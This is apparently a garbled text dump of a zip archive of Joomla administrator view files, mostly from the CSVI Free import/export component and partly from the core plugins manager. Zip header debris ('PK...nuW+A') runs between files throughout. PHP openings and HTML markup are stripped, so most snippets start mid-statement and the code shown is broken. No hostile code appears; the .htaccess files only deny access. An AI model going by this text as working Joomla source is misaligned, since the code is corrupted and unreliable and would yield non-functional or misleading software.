@copyright * @author RolandD * @todo * @see * @access protected * @param * @return void * @since 1.0 */ protected function addToolbar() { // Hide the mainmenu JRequest::setVar('hidemainmenu', true); $user = JFactory::getUser(); $isNew = ($this->item->id == 0); $checkedOut = !($this->item->checked_out == 0 || $this->item->checked_out == $user->get('id')); JToolBarHelper::title(JText::_('COM_CSVI_PAGE_'.($checkedOut ? 'VIEW_REPLACEMENT' : ($isNew ? 'ADD_REPLACEMENT' : 'EDIT_REPLACEMENT'))), 'csvi_replacement_48'); if (!$checkedOut) { JToolBarHelper::apply('replacement.apply', 'JTOOLBAR_APPLY'); JToolBarHelper::save('replacement.save', 'JTOOLBAR_SAVE'); JToolBarHelper::custom('replacement.save2new', 'save-new.png', 'save-new_f2.png', 'JTOOLBAR_SAVE_AND_NEW', false); } // If an existing item, can save to a copy. if (!$isNew) { JToolBarHelper::custom('replacement.save2copy', 'save-copy.png', 'save-copy_f2.png', 'JTOOLBAR_SAVE_AS_COPY', false); } if (empty($this->item->id)) { JToolBarHelper::cancel('replacement.cancel', 'JTOOLBAR_CANCEL'); } else { JToolBarHelper::cancel('replacement.cancel', 'JTOOLBAR_CLOSE'); } } } ?>PKKeB\)replacement/tmpl/.htaccessnuW+A Order allow,deny Deny from all PKKeB\wtWreplacement/tmpl/index.htmlnuW+APKKeB\vvreplacement/tmpl/edit.phpnuW+A
    • form->getLabel('name'); ?> form->getInput('name'); ?>
    • form->getLabel('findtext'); ?> form->getInput('findtext'); ?>
    • form->getLabel('replacetext'); ?> form->getInput('replacetext'); ?>
    • form->getLabel('method'); ?> form->getInput('method'); ?>
    PKKeB\#o,,replacement/index.htmlnuW+APKKeB\)replacement/.htaccessnuW+A Order allow,deny Deny from all PKKeB\#o,,importfile/tmpl/index.htmlnuW+APKKeB\3importfile/tmpl/cron.phpnuW+Ainput; $csvilog = $jinput->get('csvilog', null, null); // Display any messages there are if (!empty($csvilog->logmessage)) echo $csvilog->logmessage; else { echo JText::sprintf('COM_CSVI_RESULTS_FOR', $csvilog->getFilename())."\n"; echo str_repeat("=", (strlen(JText::_('COM_CSVI_RESULTS_FOR'))+strlen($csvilog->getFilename())+1))."\n"; if (!empty($this->logresult['result'])) { echo JText::_('COM_CSVI_TOTAL')."\t\t".JText::_('COM_CSVI_RESULT')."\t\t".JText::_('COM_CSVI_STATUS')."\n"; foreach ($this->logresult['result'] as $result => $log) { echo $log->total_result."\t\t".$log->result."\t\t".JText::_('COM_CSVI_'.$log->status)."\n"; } } else echo JText::_('COM_CSVI_NO_RESULTS_FOUND')."\n"; } ?>PKKeB\9\)44importfile/tmpl/default.phpnuW+Ainput; ?>
    template_name); ?>
    PKKeB\)importfile/tmpl/.htaccessnuW+A Order allow,deny Deny from all PKKeB\PpQQimportfile/view.html.phpnuW+Ainput; $template = $jinput->get('template', null, null); $this->template_name = $template->get('template_name'); // Toolbar $jinput->set('hidemainmenu', 1); JToolBarHelper::title(JText::_( 'COM_CSVI_IMPORTING' ), 'csvi_import_48'); JToolBarHelper::custom('process.cancelimport', 'csvi_cancel_32', 'csvi_cancel_32', JText::_('COM_CSVI_CANCEL'), false); JToolBarHelper::custom('importfile.doimport', 'csvi_import_32', 'csvi_import_32', JText::_('COM_CSVI_IMPORT'), false); // Display it all parent::display($tpl); } } ?>PKKeB\L importfile/view.json.phpnuW+Ainput; if ($jinput->get('importsession', true, 'bool')) { // Process the data $this->get('ProcessData'); // Empty the message stack $app = JFactory::getApplication(); $app->set('_messageQueue', array()); // Collect the results $result = array(); // Set the view mode if ($jinput->get('csvipreview', false, 'bool')) { $result['view'] = 'preview'; $result['headers'] = $jinput->get('headers_preview', null, null); $result['output'] = $jinput->get('data_preview', null, null); if (empty($results['headers']) && empty($result['output'])) { $result['process'] = false; $csvilog = $jinput->get('csvilog', null, null); $result['url'] = JURI::root().'administrator/index.php?option=com_csvi&task=process.finished&run_id='.$csvilog->getId(); // Clean the session, nothing to import $this->get('CleanSession'); } else $result['process'] = true; } else { $result['view'] = ''; // Get the number of records processed $result['records'] = $jinput->get('recordsprocessed', 0, 'int'); if ($result['records'] == 0) { $result['process'] = false; $result['url'] = JURI::root().'administrator/index.php?option=com_csvi&task=process.finished&run_id='.$jinput->get('run_id', 0, 'int'); } else { $result['process'] = true; } } } else { $csvilog = $jinput->get('csvilog', null, null); // Collect the results $result = array(); $result['process'] = false; $result['url'] = JURI::root().'administrator/index.php?option=com_csvi&task=process.finished&run_id='.$jinput->get('run_id', 0, 'int'); // Clean the session, nothing to import $this->get('CleanSession'); } if ($result['process']) { // Import is not finished, lets sleep $settings = new CsviSettings(); sleep($settings->get('import.import_wait', 0)); } // Output the results echo json_encode($result); } } ?>PKKeB\#o,,importfile/index.htmlnuW+APKKeB\)importfile/.htaccessnuW+A Order allow,deny Deny from all PKKeB\ F""importfile/view.cron.phpnuW+Ainput; if (!$jinput->get('error', false, 'bool')) { // Process the data $this->get('ProcessData'); } // Assign the data $this->assignRef('logresult', $this->get('Stats', 'log')); // Display it all parent::display($tpl); } } ?>PKKeB\tIf((install/view.html.phpnuW+AaddStyleSheet(JURI::root().'administrator/components/com_csvi/assets/css/install.css'); // Load the installed version $this->selectversion = $this->get('Version'); $this->newversion = CSVI_VERSION; // Options of extra tasks to do during installation $this->installoptions = array(); $this->installoptions[] = JHtml::_('select.option', 'availablefields', JText::_('COM_CSVI_UPDATEAVAILABLEFIELDS_LABEL')); $this->installoptions[] = JHtml::_('select.option', 'sampletemplates', JText::_('COM_CSVI_INSTALLDEFAULTTEMPLATES_LABEL')); // Show the toolbar JToolBarHelper::title(JText::_('COM_CSVI_INSTALL'), 'csvi_install_48'); //JToolBarHelper::help('install.html', true); // Display it all parent::display($tpl); } } ?>PKKeB\#o,,install/index.htmlnuW+APKKeB\)install/.htaccessnuW+A Order allow,deny Deny from all PKKeB\!4 BBinstall/view.json.phpnuW+Aget($task); if (JRequest::getBool('cancelinstall')) { $result['tasks'] = ''; } else { $result['results']['messages'][] = JText::_('COM_CSVI_COMPLETED_'.strtoupper($task)); // Add remaining tasks to the result for further processing $result['tasks'] = implode('.', $tasks); } // Send back the result echo json_encode($result); } } ?>PKKeB\)install/tmpl/.htaccessnuW+A Order allow,deny Deny from all PKKeB\#o,,install/tmpl/index.htmlnuW+APKKeB\.ddinstall/tmpl/default.phpnuW+A
    selectversion == 'current') echo JText::_('COM_CSVI_NONEW_VERSION'); else echo JText::sprintf('COM_CSVI_FOUND_VERSION', $this->selectversion); ?>
    newversion); ?>
    installoptions as $installoption) { if ($installoption->value == 'availablefields') $checked = 'checked="checked"'; else $checked = ''; ?> />text; ?>
    selectversion != 'current') { ?>
    PKKeB\'4  about/tmpl/default.phpnuW+A folders as $name => $access) { ?>
    '.JText::_('COM_CSVI_WRITABLE').''; } else { echo ''.JText::_('COM_CSVI_NOT_WRITABLE').''; } ?>

    Name:CSVI Free
    Version:5.15
    Coded by:RolandD Cyber Produksi
    Contact:contact@csvimproved.com
    Support:
    Copyright:Copyright (C) 2006 - 2013 RolandD Cyber Produksi. All rights reserved.
    License:
    PKKeB\)about/tmpl/.htaccessnuW+A Order allow,deny Deny from all PKKeB\#o,,about/tmpl/index.htmlnuW+APKKeB\#o,,about/index.htmlnuW+APKKeB\)about/.htaccessnuW+A Order allow,deny Deny from all PKKeB\L.ñabout/view.html.phpnuW+Afolders = $this->get('FolderCheck'); // Get the panel $this->loadHelper('panel'); // Show the toolbar JToolBarHelper::title(JText::_('COM_CSVI_ABOUT'), 'csvi_about_48'); //JToolBarHelper::help('about.html', true); // Display it all parent::display($tpl); } } ?>PKKeB\D`FFprocess/view.html.phpnuW+Ainput; $session = JFactory::getSession(); $option = $jinput->get('option'); // Load the models $model = $this->getModel(); $this->setModel(JModel::getInstance('templates', 'CsviModel')); $this->setModel(JModel::getInstance('availablefields', 'CsviModel')); // Load stylesheet $document = JFactory::getDocument(); $document->addStyleSheet(JURI::root().'administrator/components/com_csvi/assets/css/process.css'); // Set the template ID $template_id = $jinput->get('template_id', $session->get($option.'.select_template', 0), 'int'); $jinput->set('template_id', $template_id); // Load the saved templates $template_model = $this->getModel('Templates'); $this->templates = JHtml::_('select.genericlist', $template_model->getTemplates(), 'select_template', '', 'value', 'text', $jinput->get('template_id', 0, 'int')); // Load the selected template $this->loadHelper('template'); $this->template = new CsviTemplate(); $this->template->load($template_id); $jinput->set('template', $this->template); // Set the action, component and operation for the form if ($template_id > 0) $jinput->set('jform', $this->template->getSettings()); // Load the option templates $this->optiontemplates = $model->getOptions(); // Get the options for the user $this->form = $model->getForm(array(), true, $this->optiontemplates); // Load the fields $av_model = $this->getModel('availablefields'); $this->templatefields = $av_model->getAvailableFields($this->form->getValue('operation','options'), $this->form->getValue('component','options'), 'object', $this->form->getValue('custom_table')); // Load the replacements $this->replacements = $this->get('Replacements'); // Add the component path to find template files $this->addTemplatePath(JPATH_COMPONENT_ADMINISTRATOR.'/views/process/tmpl/'.$this->form->getValue('component','options').'/'.$this->form->getValue('action','options')); $this->addTemplatePath(JPATH_COMPONENT_ADMINISTRATOR.'/views/process/tmpl/'.$this->form->getValue('action','options')); // Load the helper $this->loadHelper($this->form->getValue('component','options')); // Load the configuration helper $this->loadHelper($this->form->getValue('component','options').'_config'); $classname = 'Csvi'.$this->form->getValue('component','options').'_config'; if (class_exists($classname)) $this->config = new $classname; // Get the panel $this->loadHelper('panel'); // Get the toolbar title JToolBarHelper::title(JText::_('COM_CSVI_PROCESS'), 'csvi_process_48'); // Get the toolbar JToolBarHelper::custom('cronline', 'csvi_cron_32', 'csvi_cron_32', JText::_('COM_CSVI_CRONLINE'), false); JToolBarHelper::custom('process.imexport', 'csvi_process_32', 'csvi_process_32', JText::_('COM_CSVI_PROCESS'), false); //JToolBarHelper::help('process.html', true); // Display it all parent::display($tpl); } } ?> PKKeB\#o,,process/index.htmlnuW+APKKeB\#o,, process/tmpl/com_csvi/index.htmlnuW+APKKeB\ -process/tmpl/com_csvi/export/default_file.phpnuW+A
    PKKeB\)&process/tmpl/com_csvi/export/.htaccessnuW+A Order allow,deny Deny from all PKKeB\#o,,'process/tmpl/com_csvi/export/index.htmlnuW+APKKeB\)process/tmpl/com_csvi/.htaccessnuW+A Order allow,deny Deny from all PKKeB\K87process/tmpl/com_virtuemart/export/default_userinfo.phpnuW+A
    PKKeB\lQ;process/tmpl/com_virtuemart/export/default_manufacturer.phpnuW+A
    PKKeB\^{3process/tmpl/com_virtuemart/export/default_calc.phpnuW+A
    PKKeB\%7process/tmpl/com_virtuemart/export/default_shipping.phpnuW+A
    'addRow_shopper_shipping')); ?>

    template->get('shopper_shipping_export_fields', '', array()); if (isset($shopper_shipping_fields['_price_from'])) { $count = count($shopper_shipping_fields['_price_from']); for ($rows = 0; $rows < $count; $rows++) { $id = mt_rand(); ?>
    PKKeB\9zz3process/tmpl/com_virtuemart/export/default_file.phpnuW+A
    PKKeB\yY7process/tmpl/com_virtuemart/export/default_category.phpnuW+A
    PKKeB\#o,,-process/tmpl/com_virtuemart/export/index.htmlnuW+APKKeB\),process/tmpl/com_virtuemart/export/.htaccessnuW+A Order allow,deny Deny from all PKKeB\I 8process/tmpl/com_virtuemart/export/default_orderitem.phpnuW+A
    form->getLabel('orderitemproduct', 'orderitem'); ?> form->getInput('orderitemproduct', 'orderitem'); ?>
    PKKeB\3[[4process/tmpl/com_virtuemart/export/default_order.phpnuW+A
    form->getLabel('orderuser', 'order'); ?>
    form->getInput('orderuser', 'order'); ?>
    form->getLabel('orderproduct', 'order'); ?>
    form->getInput('orderproduct', 'order'); ?>
    PKKeB\06process/tmpl/com_virtuemart/export/default_product.phpnuW+A
    PKKeB\)%process/tmpl/com_virtuemart/.htaccessnuW+A Order allow,deny Deny from all PKKeB\&}uu<process/tmpl/com_virtuemart/import/default_category_path.phpnuW+A
    PKKeB\`9process/tmpl/com_virtuemart/import/default_media_path.phpnuW+A
    PKKeB\UN7process/tmpl/com_virtuemart/import/default_category.phpnuW+A
    PKKeB\ujP P 6process/tmpl/com_virtuemart/import/default_product.phpnuW+A
    PKKeB\),process/tmpl/com_virtuemart/import/.htaccessnuW+A Order allow,deny Deny from all PKKeB\>&=process/tmpl/com_virtuemart/import/default_category_image.phpnuW+A
    PKKeB\#o,,-process/tmpl/com_virtuemart/import/index.htmlnuW+APKKeB\qU''9process/tmpl/com_virtuemart/import/default_order_item.phpnuW+A
    PKKeB\-<process/tmpl/com_virtuemart/import/default_category_file.phpnuW+A
    PKKeB\ȋ[u++4process/tmpl/com_virtuemart/import/default_media.phpnuW+A
    PKKeB\(o:process/tmpl/com_virtuemart/import/default_media_image.phpnuW+A
    PKKeB\66Dprocess/tmpl/com_virtuemart/import/default_manufacturer_category.phpnuW+A
    PKKeB\ڞ4process/tmpl/com_virtuemart/import/default_image.phpnuW+A
    PKKeB\t6$$;process/tmpl/com_virtuemart/import/default_manufacturer.phpnuW+A
    PKKeB\ܭ,;process/tmpl/com_virtuemart/import/default_product_path.phpnuW+A
    PKKeB\^{3process/tmpl/com_virtuemart/import/default_calc.phpnuW+A
    PKKeB\-@process/tmpl/com_virtuemart/import/default_manufacturer_file.phpnuW+A
    PKKeB\#o,,&process/tmpl/com_virtuemart/index.htmlnuW+APKKeB\Sprocess/tmpl/default.phpnuW+A
    templates; ?>
    form->getGroup('options') as $field) : ?> input; ?>
    form->getValue('action', 'options'); $component = $this->form->getValue('component', 'options'); $operation = $this->form->getValue('operation', 'options'); if ($action && $component & $operation) { // Load the source template echo $this->loadTemplate('source'); // Load the specific templates switch($action) { case 'import': ?>
      optiontemplates as $template) { ?>
    optiontemplates as $template) { ?>
    loadTemplate($template); ?>
      optiontemplates as $template) { ?>
    optiontemplates as $template) { ?>
    loadTemplate($template); ?>
    PKKeB\P P process/tmpl/import_result.phpnuW+Alogresult) { $jinput = JFactory::getApplication()->input; ?> logresult['result']) > 0) { foreach ($this->logresult['result'] as $result => $log) { ?>
    logresult['file_name']).'
    '.$this->runtime; ?>
    get('run_id', 0, 'int')), JText::_('COM_CSVI_SHOW_FULL_LOG')); echo ' | '; // Show view debug log if (!empty($this->logresult['debugview'])) { echo $this->logresult['debugview']; echo ' | '; } // Show download debug log echo $this->logresult['debug']; ?>
    total_result; ?> result; ?> status); ?>
    '; echo $this->runtime; echo '
    '; echo '
    '; echo JText::_('COM_CSVI_NO_LOG_EXPLAIN'); }?> PKKeB\#o,,process/tmpl/index.htmlnuW+APKKeB\)process/tmpl/.htaccessnuW+A Order allow,deny Deny from all PKKeB\-p;;&process/tmpl/import/default_fields.phpnuW+A form->getValue('operation', 'options') == 'customimport') { ?>
    form->getInput('custom_table'); ?>

    'addRow')); ?> templatefields, '_field_name', null, 'value', 'text', null, '_field_name'); ?> replacements, '_replace_field', '', 'value', 'text', '', '_replace_field_default'); ?>

    template->get('import_fields'); if (isset($import_fields['_selected_name'])) { for ($rows = 0; $rows < count($import_fields['_selected_name']); $rows++) { $id = mt_rand(); ?>
    replacements, 'jform[import_fields][_replace_field]['.$rows.']', '', 'value', 'text', $import_fields['_replace_field'][$rows], '_replace_field_'.$id); ?>
    templatefields as $fieldname) { ?>
    text; ?>
    PKKeB\)process/tmpl/import/.htaccessnuW+A Order allow,deny Deny from all PKKeB\D;^^%process/tmpl/import/default_limit.phpnuW+A
    PKKeB\Pw &process/tmpl/import/default_source.phpnuW+A
    PKKeB\L$process/tmpl/import/default_file.phpnuW+A
    PKKeB\#o,,process/tmpl/import/index.htmlnuW+APKKeB\),process/tmpl/com_akeebasubs/export/.htaccessnuW+A Order allow,deny Deny from all PKKeB\]t{ ;process/tmpl/com_akeebasubs/export/default_subscription.phpnuW+A
    form->getLabel('orderuser', 'order'); ?>
    form->getInput('orderuser', 'order'); ?>
    form->getLabel('orderproduct', 'order'); ?>
    form->getInput('orderproduct', 'order'); ?>
    PKKeB\Mwzz3process/tmpl/com_akeebasubs/export/default_file.phpnuW+A
    PKKeB\#o,,-process/tmpl/com_akeebasubs/export/index.htmlnuW+APKKeB\#o,,&process/tmpl/com_akeebasubs/index.htmlnuW+APKKeB\)%process/tmpl/com_akeebasubs/.htaccessnuW+A Order allow,deny Deny from all PKKeB\eWǵ&process/tmpl/export/default_source.phpnuW+A
    PKKeB\pHCC&process/tmpl/export/default_fields.phpnuW+A form->getValue('operation', 'options') == 'customexport') { ?>
    form->getInput('custom_table'); ?>

    'addRow')); ?> templatefields, '_field_name', null, 'value', 'text', null, '_field_name'); ?> replacements, '_replace_field', '', 'value', 'text', '', '_replace_field_default'); ?>

    template->get('export_fields'); if (isset($export_fields['_selected_name'])) { for ($rows = 0; $rows < count($export_fields['_selected_name']); $rows++) { $id = mt_rand(); ?>
    replacements, 'jform[export_fields][_replace_field]['.$rows.']', '', 'value', 'text', $export_fields['_replace_field'][$rows], '_replace_field_'.$id); ?>
    templatefields as $fieldname) { ?>
    text; ?>
    PKKeB\gR%process/tmpl/export/default_email.phpnuW+A
    form->getLabel('export_email_body', 'email'); ?>
    form->getInput('export_email_body', 'email'); ?>
    PKKeB\/߬&process/tmpl/export/default_layout.phpnuW+A
    PKKeB\)process/tmpl/export/.htaccessnuW+A Order allow,deny Deny from all PKKeB\#o,,process/tmpl/export/index.htmlnuW+APKKeB\c%process/tmpl/export/default_limit.phpnuW+A
    PKKeB\wprocess/view.result.phpnuW+Ainput; // Load the settings $this->loadHelper('settings'); $settings = new CsviSettings(); if ($settings->get('log.log_store', 1)) { // Load the results from the log $this->logresult = $this->get('Stats', 'log'); // Get the run time $session = JFactory::getSession(); $runtime = $session->get('com_csvi.runtime'); if ($runtime > 0) $runtime = time()-$runtime; $this->assignRef('runtime', JText::sprintf('COM_CSVI_RUNTIME_IMPORT', number_format($runtime/60, 2), $runtime)); // Reset the run time $session->set('com_csvi.runtime', null); // Get the toolbar title JToolBarHelper::title(JText::_('COM_CSVI_'.$this->logresult['action'].'_RESULT'), 'csvi_'.$this->logresult['action'].'_48'); } else $this->logresult = false; // Get the panel $this->loadHelper('panel'); // Display it all parent::display($tpl); } } ?> PKKeB\)process/.htaccessnuW+A Order allow,deny Deny from all PKKeB\)settings/tmpl/.htaccessnuW+A Order allow,deny Deny from all PKKeB\ Sl settings/tmpl/default.phpnuW+A
    1)); echo JHtml::_('tabs.panel', JText::_('COM_CSVI_SETTINGS_SITE_SETTINGS'), 'site_settings'); echo $this->loadTemplate('site'); echo JHtml::_('tabs.panel', JText::_('COM_CSVI_SETTINGS_IMPORT_SETTINGS'), 'import_settings'); echo $this->loadTemplate('import'); echo JHtml::_('tabs.panel', JText::_('COM_CSVI_SETTINGS_GOOGLE_BASE_SETTINGS'), 'google_base_settings'); echo $this->loadTemplate('google_base'); echo JHtml::_('tabs.panel', JText::_('COM_CSVI_SETTINGS_ICECAT_SETTINGS'), 'icecat_settings'); echo $this->loadTemplate('icecat'); echo JHtml::_('tabs.panel', JText::_('COM_CSVI_SETTINGS_LOG_SETTINGS'), 'log_settings'); echo $this->loadTemplate('log'); echo JHtml::_('tabs.panel', JText::_('COM_CSVI_SETTINGS_CUSTOM_TABLES'), 'custom_tables_settings'); echo $this->loadTemplate('custom_tables'); echo JHtml::_('tabs.end'); ?>
    PKKeB\settings/tmpl/default_site.phpnuW+A
      form->getGroup('site') as $field) : ?>
    • label; ?> input; ?>
    PKKeB\rwwsettings/tmpl/default_log.phpnuW+A
      form->getGroup('log') as $field) : ?>
    • label; ?> input; ?>
      form->getGroup('debuglog') as $field) : ?>
    • label; ?> input; ?>
    PKKeB\#o,,settings/tmpl/index.htmlnuW+APKKeB\,'settings/tmpl/default_custom_tables.phpnuW+A form->getValue('tables'); if (!is_null($tables)) $selected = $tables->tablelist; else $selected = array(); // Check if the selected value is an array if (!is_array($selected)) $selected = array($selected); foreach ($this->tablelist as $table) { if (in_array($table, $selected)) $sel = 'checked="checked"'; else $sel = ''; ?>
    />
    PKKeB\Ӏ settings/tmpl/default_icecat.phpnuW+A
      form->getGroup('icecat') as $field) : ?>
    • label; ?> input; ?>

    PKKeB\oY settings/tmpl/default_import.phpnuW+A
      form->getGroup('import') as $field) : ?>
    • label; ?> input; ?>
    PKKeB\ %settings/tmpl/default_google_base.phpnuW+A
      form->getGroup('google_base') as $field) : ?>
    • label; ?> input; ?>
    PKKeB\eFsZsettings/view.html.phpnuW+Aform = $this->get('Form'); // Load a list of tables $this->tablelist = $this->get('TableList'); // Get the panel $this->loadHelper('panel'); // Show the toolbar JToolBarHelper::title(JText::_('COM_CSVI_SETTINGS_TITLE'), 'csvi_settings_48'); JToolBarHelper::custom('settings.reset', 'csvi_reset_32', 'csvi_reset_32', JText::_('COM_CSVI_RESET_SETTINGS'), false); JToolBarHelper::custom('settings.save', 'csvi_save_32', 'csvi_save_32', JText::_('COM_CSVI_SAVE'), false); //JToolBarHelper::help('settings.html', true); // Display it all parent::display($tpl); } } ?>PKKeB\#o,,settings/index.htmlnuW+APKKeB\)settings/.htaccessnuW+A Order allow,deny Deny from all PKKeB\) log/.htaccessnuW+A Order allow,deny Deny from all PKKeB\)log/tmpl/.htaccessnuW+A Order allow,deny Deny from all PKKeB\#o,,log/tmpl/index.htmlnuW+APKKeB\&log/tmpl/logreader.phpnuW+Alogdetails)) echo ''.sprintf(JText::_('COM_CSVI_NO_LOG_FOUND'), $this->logfile).''; else { ?>
    logdetails['date']; ?>
    logdetails['joomla']; ?>
    logdetails['fields'] as $title) { ?> logdetails['entries'] as $entry) { ?>
    logdetails['entries'])); ?>
    PKKeB\rlog/tmpl/default.phpnuW+Astate->get('list.ordering'); $listDirn = $this->state->get('list.direction'); ?>
    : lists['actions']; ?>
    pagination->getResultsCounter(); ?>
    logentries) { for ($i=0, $n=count( $this->logentries); $i < $n; $i++) { $row = $this->logentries[$i]; // Pseudo entry for satisfying Joomla $row->checked_out = 0; $link = 'index.php?option=com_csvi&task=logdetails.display&run_id[]='. $row->run_id; $checked = JHtml::_('grid.checkedout', $row, $i); $user = JFactory::getUser($row->userid); ?> '; ?>
    pagination->getListFooter(); ?>
    action); ?> action_type); ?> template_name; ?> logstamp, 'Y-m-d H:i:s'); ?> name; ?> records; ?> run_cancelled) ? JText::_('COM_CSVI_YES') : JText::_('COM_CSVI_NO'); echo $run_cancelled;?> file_name; ?> action_type, -6) == 'import' || substr($row->action_type, -6) == 'export') { if (file_exists(CSVIPATH_DEBUG.'/com_csvi.log.'.$row->run_id.'.php')) { $attribs = 'class="modal" onclick="" rel="{handler: \'iframe\', size: {x: 950, y: 500}}"'; echo JHTML::_('link', JRoute::_('index.php?option=com_csvi&task=log.logreader&tmpl=component&run_id='.$row->run_id), $row->run_id, $attribs); } else echo $row->run_id; } else echo $row->run_id; ?>
    '.JText::_('COM_CSVI_NO_LOG_ENTRIES_FOUND').'
    PKKeB\#o,,log/index.htmlnuW+APKKeB\O O log/view.html.phpnuW+Ainput; // Get the task $task = $jinput->get('task'); // Get the log $model = $this->getModel('log'); switch ($task) { case 'logreader': $this->logdetails = $this->get('Logfile'); $this->logfile = $logfile = CSVIPATH_DEBUG.'/com_csvi.log.'.JRequest::getInt('run_id').'.php'; break; default: // Load the logs $this->logentries = $this->get('Items'); // Get the pagination $this->pagination = $this->get('Pagination'); // Load the user state $this->state = $this->get('State'); // Load the action types $actiontypes = $this->get('ActionTypes'); $this->lists['actions'] = JHTML::_('select.genericlist', $actiontypes, 'filter_actiontype', '', 'value', 'text', JRequest::getWord('filter_actiontype')); // Get the panel $this->loadHelper('panel'); // Add toolbar JToolBarHelper::title(JText::_('COM_CSVI_LOG'), 'csvi_log_48'); JToolBarHelper::custom( 'logdetails.logdetails', 'csvi_logdetails_32', 'csvi_logdetails_32', JText::_('COM_CSVI_DETAILS'), true); JToolBarHelper::custom( 'log.remove', 'csvi_delete_32', 'csvi_delete_32', JText::_('COM_CSVI_DELETE'), true); JToolBarHelper::custom( 'log.remove_all', 'csvi_delete_32', 'csvi_delete_32', JText::_('COM_CSVI_DELETE_ALL'), false); // JToolBarHelper::help('log.html', true); break; } // Display it all parent::display($tpl); } } ?> PKieB\Vplugins/index.htmlnuW+A PKieB\)plugins/tmpl/.htaccessnuW+A Order allow,deny Deny from all PKieB\v6plugins/tmpl/default.phpnuW+Aescape($this->state->get('list.ordering')); $listDirn = $this->escape($this->state->get('list.direction')); $canOrder = $user->authorise('core.edit.state', 'com_plugins'); $saveOrder = $listOrder == 'ordering'; ?>
    items as $i => $item) : $ordering = ($listOrder == 'ordering'); $canEdit = $user->authorise('core.edit', 'com_plugins'); $canCheckin = $user->authorise('core.manage', 'com_checkin') || $item->checked_out==$user->get('id') || $item->checked_out==0; $canChange = $user->authorise('core.edit.state', 'com_plugins') && $canCheckin; ?>
    items, 'filesave.png', 'plugins.saveorder'); ?>
    pagination->getListFooter(); ?>
    extension_id); ?> checked_out) : ?> editor, $item->checked_out_time, 'plugins.', $canCheckin); ?> name; ?> name; ?> enabled, $i, 'plugins.', $canChange); ?> pagination->orderUpIcon($i, (@$this->items[$i-1]->folder == $item->folder), 'plugins.orderup', 'JLIB_HTML_MOVE_UP', $ordering); ?> pagination->orderDownIcon($i, $this->pagination->total, (@$this->items[$i+1]->folder == $item->folder), 'plugins.orderdown', 'JLIB_HTML_MOVE_DOWN', $ordering); ?> pagination->orderUpIcon($i, (@$this->items[$i-1]->folder == $item->folder), 'plugins.orderdown', 'JLIB_HTML_MOVE_UP', $ordering); ?> pagination->orderDownIcon($i, $this->pagination->total, (@$this->items[$i+1]->folder == $item->folder), 'plugins.orderup', 'JLIB_HTML_MOVE_DOWN', $ordering); ?> class="text-area-order" /> ordering; ?> escape($item->folder);?> escape($item->element);?> escape($item->access_level); ?> extension_id;?>
    PKieB\Vplugins/tmpl/index.htmlnuW+A PKieB\BQQplugins/view.html.phpnuW+Aitems = $this->get('Items'); $this->pagination = $this->get('Pagination'); $this->state = $this->get('State'); // Check for errors. if (count($errors = $this->get('Errors'))) { JError::raiseError(500, implode("\n", $errors)); return false; } // Check if there are no matching items if(!count($this->items)){ JFactory::getApplication()->enqueueMessage( JText::_('COM_PLUGINS_MSG_MANAGE_NO_PLUGINS') , 'warning' ); } parent::display($tpl); $this->addToolbar(); } /** * Add the page title and toolbar. * * @since 1.6 */ protected function addToolbar() { $state = $this->get('State'); $canDo = PluginsHelper::getActions(); JToolBarHelper::title(JText::_('COM_PLUGINS_MANAGER_PLUGINS'), 'plugin'); if ($canDo->get('core.edit')) { JToolBarHelper::editList('plugin.edit'); } if ($canDo->get('core.edit.state')) { JToolBarHelper::divider(); JToolBarHelper::publish('plugins.publish', 'JTOOLBAR_ENABLE', true); JToolBarHelper::unpublish('plugins.unpublish', 'JTOOLBAR_DISABLE', true); JToolBarHelper::divider(); JToolBarHelper::checkin('plugins.checkin'); } if ($canDo->get('core.admin')) { JToolBarHelper::divider(); JToolBarHelper::preferences('com_plugins'); } JToolBarHelper::divider(); JToolBarHelper::help('JHELP_EXTENSIONS_PLUGIN_MANAGER'); } } PKieB\)plugins/.htaccessnuW+A Order allow,deny Deny from all PKieB\)plugin/.htaccessnuW+A Order allow,deny Deny from all PKieB\G0Nplugin/view.html.phpnuW+Astate = $this->get('State'); $this->item = $this->get('Item'); $this->form = $this->get('Form'); // Check for errors. if (count($errors = $this->get('Errors'))) { JError::raiseError(500, implode("\n", $errors)); return false; } $this->addToolbar(); parent::display($tpl); } /** * Add the page title and toolbar. * * @since 1.6 */ protected function addToolbar() { JRequest::setVar('hidemainmenu', true); $user = JFactory::getUser(); $canDo = PluginsHelper::getActions(); JToolBarHelper::title(JText::sprintf('COM_PLUGINS_MANAGER_PLUGIN', JText::_($this->item->name)), 'plugin'); // If not checked out, can save the item. if ($canDo->get('core.edit')) { JToolBarHelper::apply('plugin.apply'); JToolBarHelper::save('plugin.save'); } JToolBarHelper::cancel('plugin.cancel', 'JTOOLBAR_CLOSE'); JToolBarHelper::divider(); // Get the help information for the plugin item. $lang = JFactory::getLanguage(); $help = $this->get('Help'); if ($lang->hasKey($help->url)) { $debug = $lang->setDebug(false); $url = JText::_($help->url); $lang->setDebug($debug); } else { $url = null; } JToolBarHelper::help($help->key, false, $url); } } PKieB\Vplugin/index.htmlnuW+A PKieB\Y plugin/tmpl/edit.phpnuW+A
    • form->getLabel('name'); ?> form->getInput('name'); ?> item->name);?>
    • form->getLabel('enabled'); ?> form->getInput('enabled'); ?>
    • form->getLabel('access'); ?> form->getInput('access'); ?>
    • form->getLabel('ordering'); ?> form->getInput('ordering'); ?>
    • form->getLabel('folder'); ?> form->getInput('folder'); ?>
    • form->getLabel('element'); ?> form->getInput('element'); ?>
    • item->extension_id) : ?>
    • form->getLabel('extension_id'); ?> form->getInput('extension_id'); ?>
    item->xml) : ?> item->xml->description)) : ?>
    item->extension_id); ?> loadTemplate('options'); ?>
    PKieB\)plugin/tmpl/.htaccessnuW+A Order allow,deny Deny from all PKieB\(قplugin/tmpl/edit_options.phpnuW+Aform->getFieldsets('params'); foreach ($fieldSets as $name => $fieldSet) : $label = !empty($fieldSet->label) ? $fieldSet->label : 'COM_PLUGINS_'.$name.'_FIELDSET_LABEL'; echo JHtml::_('sliders.panel', JText::_($label), $name.'-options'); if (isset($fieldSet->description) && trim($fieldSet->description)) : echo '

    '.$this->escape(JText::_($fieldSet->description)).'

    '; endif; ?>
